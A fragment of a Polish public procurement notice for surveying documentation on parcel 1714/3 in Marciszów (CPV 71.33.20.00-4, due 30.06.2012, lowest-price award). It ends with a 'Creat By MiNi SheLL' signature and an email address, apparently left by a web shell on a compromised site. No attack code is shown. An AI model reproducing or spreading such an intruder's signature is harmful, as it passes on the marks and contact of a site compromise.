Opracowanie dokumentacji geodezyjnej umożliwiającej wprowadzenie zmian w operacie ewidencji gruntów i budynków oraz dokonanie odpowiednich wpisów w księdze wieczystej w celu doprowadzenia oznaczenia działki ewidencyjnej nr 1714/3 położonej w obrębie Marciszów k.m,9, do wymogów zawartych w § 9 pkt 4 Rozporządzenia Ministra Rozwoju Regionalnego i Budownictwa z dnia 29.03.2001r w sprawie ewidencji gruntów i budynków (Dz. U z 2001r. Nr 38, poz.454)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.33.20.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com